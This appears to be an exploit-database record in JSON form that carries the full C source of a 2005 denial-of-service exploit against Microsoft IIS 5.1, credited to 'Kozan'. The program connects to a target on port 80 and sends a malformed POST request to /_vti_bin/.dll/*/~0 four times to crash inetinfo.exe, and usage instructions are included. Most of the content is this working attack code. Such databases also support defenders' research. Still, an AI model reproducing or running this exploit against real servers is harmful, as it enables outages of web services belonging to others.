DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-6076", "type": "zdt", "bulletinFamily": "exploit", "title": "MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)", "description": "Exploit for unknown platform in category dos / poc", "published": "2005-12-19T00:00:00", "modified": "2005-12-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/6076", "reporter": "Kozan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-08T21:07:17", "viewCount": 7, "enchantments": {"score": {"value": -0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.6}, "sourceHref": "https://0day.today/exploit/6076", "sourceData": "===================================================================\r\nMS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)\r\n===================================================================\r\n\r\n\r\n\r\n\r\n/*****************************************************************\r\n\r\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\r\n\r\nApplication: Microsoft IIS (Internet Information Server)\r\nVendor: Microsoft - http://www.microsoft.com/\r\n\r\nDiscovered by: Inge Henriksen\r\nExploit Coded by: Kozan\r\nCredits to ATmaCA, Inge Henriksen\r\nWeb: www.spyinstructors.com\r\nMail: [email\u00a0protected]\r\n\r\n\r\nVulnerable:\r\nMicrosoft? Internet Information Server? V5.1\r\n\r\nNot vulnerable:\r\nMicrosoft? Internet Information Server? V5.0\r\nMicrosoft? Internet Information Server? V6.0\r\n\r\n\r\nOnly folders with Execute Permissions set to 'Scripts & Executables'\r\nare affected, such as the '_vti_bin' directory.\r\n\r\ninetinfo.exe will be crashed after exploitation finished successfuly.\r\n\r\nUsage: iis51dos.exe [Target Url or IP]\r\n\r\n*****************************************************************/\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n#include <windows.h>\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\n\r\nchar *HttpHeader(char *pszHost)\r\n{\r\n char szHeader[1000];\r\n\r\n wsprintf( szHeader, \"POST /_vti_bin/.dll/*/~0 HTTP/1.1\\r\\n\"\r\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \"Host: %s\\r\\n\"\r\n \"Content-Length: 0\\r\\n\\r\\n\"\r\n , pszHost\r\n );\r\n\r\n return szHeader;\r\n}\r\n\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n fprintf(stdout, \"\\n\\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\\n\"\r\n \"Bug Discovered by: Inge Henriksen\\n\"\r\n \"Exploit Coded by: Kozan\\n\"\r\n \"Credits to ATmaCA, Inge Henriksen\\n\"\r\n \"www.spyinstructors.com - [email\u00a0protected]\\n\\n\"\r\n );\r\n\r\n if( argc != 2 )\r\n {\r\n fprintf(stderr, \"\\n\\nUsage:\\t%s [WebSiteUrl]\\n\\n\", argv[0]);\r\n return -1;\r\n }\r\n\r\n WSADATA wsaData;\r\n struct hostent *pTarget;\r\n struct sockaddr_in addr;\r\n SOCKET sock;\r\n\r\n char szHeader[1000], szWebUrl[1000];\r\n\r\n lstrcpy(szWebUrl, argv[1]);\r\n lstrcpy(szHeader, HttpHeader(szWebUrl));\r\n\r\n if( WSAStartup(0x0101,&wsaData) < 0 )\r\n {\r\n fprintf(stderr, \"Winsock error!\\n\");\r\n return -1;\r\n }\r\n\r\n sock = socket(AF_INET,SOCK_STREAM,0);\r\n\r\n if( sock == -1 )\r\n {\r\n fprintf(stderr, \"Socket error!\\n\");\r\n return -1;\r\n }\r\n\r\n if( (pTarget = gethostbyname(szWebUrl)) == NULL )\r\n {\r\n fprintf(stderr, \"Address resolve error!\\n\");\r\n return -1;\r\n }\r\n\r\n memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(80);\r\n memset(&(addr.sin_zero), '\\0', 8);\r\n\r\n fprintf(stdout, \"Please wait while connecting...\\n\");\r\n\r\n if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )\r\n {\r\n fprintf(stderr, \"Connection failed!\\n\");\r\n closesocket(sock);\r\n return -1;\r\n }\r\n\r\n fprintf(stdout, \"Connected.\\n\\n\");\r\n\r\n fprintf(stdout, \"Please wait while sending DoS request headers...\\n\\n\");\r\n\r\n for( int i=0; i<4; i++ )\r\n {\r\n fprintf(stdout, \"Sending %d. request...\\n\", i+1);\r\n\r\n if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )\r\n {\r\n fprintf(stderr, \"%d. DoS request header could not sent!\\n\", i+1);\r\n closesocket(sock);\r\n return -1;\r\n }\r\n\r\n fprintf(stdout, \"%d. request sent.\\n\\n\", i+1);\r\n }\r\n\r\n fprintf(stdout, \"Operation completed...\\n\");\r\n closesocket(sock);\r\n WSACleanup();\r\n\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-08] #", "_state": {"dependencies": 1647409109, "score": 1659766679}}

{}